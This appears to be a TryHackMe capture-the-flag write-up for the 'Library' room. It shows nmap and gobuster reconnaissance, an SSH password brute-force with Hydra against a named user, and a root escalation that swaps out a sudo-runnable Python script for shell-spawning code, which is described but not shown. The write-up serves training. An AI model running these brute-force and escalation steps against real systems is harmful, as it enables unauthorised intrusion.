TryHackMe | Library Writeup
boot2root machine for FIT and bsides guatemala CTF
Find This Room: Library
Recon
whoami@mint:~/Desktop/THM-Lab/Library$ nmap -sV MachineIP
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
1071/tcp filtered bsquare-voip no-response
25735/tcp filtered unknown no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.19 secondsFrom the scan we find that the ports for SSH and HTTP are open.
HTTP is open so let’s do a Gobuster scan to look for any interesting directories. We’ll use the common.txt wordlist so the following will be the full command.
gobuster dir -u http://MachineIP -w /usr/share/wordlists/dirb/common.txtWe are returned a list of directories.
2024/11/11 12:19:32 Starting gobuster in directory enumeration mode
/.htaccess (Status: 403) [Size: 297]
/ .hta (Status: 403) [Size: 292]
/.htpasswd (Status: 403) [Size: 297]
/images (Status: 301) [Size: 315] [→ http://MachineIP/images/]
/index.html (Status: 200) [Size: 5439]
/robots.txt (Status: 200) [Size: 33]
/server-status (Status: 403) [Size: 301]
2024/11/11 12:19:43 FinishedThe only interesting directories are images and robots.txt. Let’s take a look at the home page before we look at both of them.
Home page of the website
We’re looking at a blog. One of the posts is by a user named “meliodas”, at the bottom of the page are three comments by root, www-data, and Anonymous. We may need to login as meliodas so let’s remember the name and check out the two directories we found in the Gobuster scan.
Contents of rockyou
This looks like a hint that a password for a user is found in rockyou. Let’s try this with the meliodas account using Hydra. The following will be the full command.
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://MachineIPWithin a few minutes we get our password.
Finding the password for meliodas
Now that we have the password, let’s SSH into the machine and get the user flag.
We got the user flag, let’s try to escalate our privileges to root now.
2. root.txt
The first thing I always check when seeing if I can escalate privileges is to look at any sudo permissions our user is given. We can use “sudo -l” to list these.
Looking at our sudo permissions
We’re allowed to use python to run a script called bak.py, python can let us spawn a root shell, so let’s see what’s in this script.
Inside the bak.py file
We can’t write our shell into the file as it is owned by root and we don’t have write permission. The file is in our directory though, so we should be able to delete the file and replace it with our exploit.
File is owned by root
We can remove the file by using the following command.
rm -f bak.pyLet’s now create a new file named bak.py by using nano. We can then put in code to spawn us a root shell.
Code to spawn our shell
With our code ready, we can use the following command to run our code and get root.
Now we can change to the root directory and grab the flag.
root@ubuntu:~# cd /root
root@ubuntu:/root# ls
root.txt
root@ubuntu:/root# cat root.txt
Conclusion:
I think getting into the user account could be a bit more difficult but other than that I think the room was good. There seems to be a few ways of getting root which is nice. I would recommend this room to someone who wants to practice basic privilege escalation.
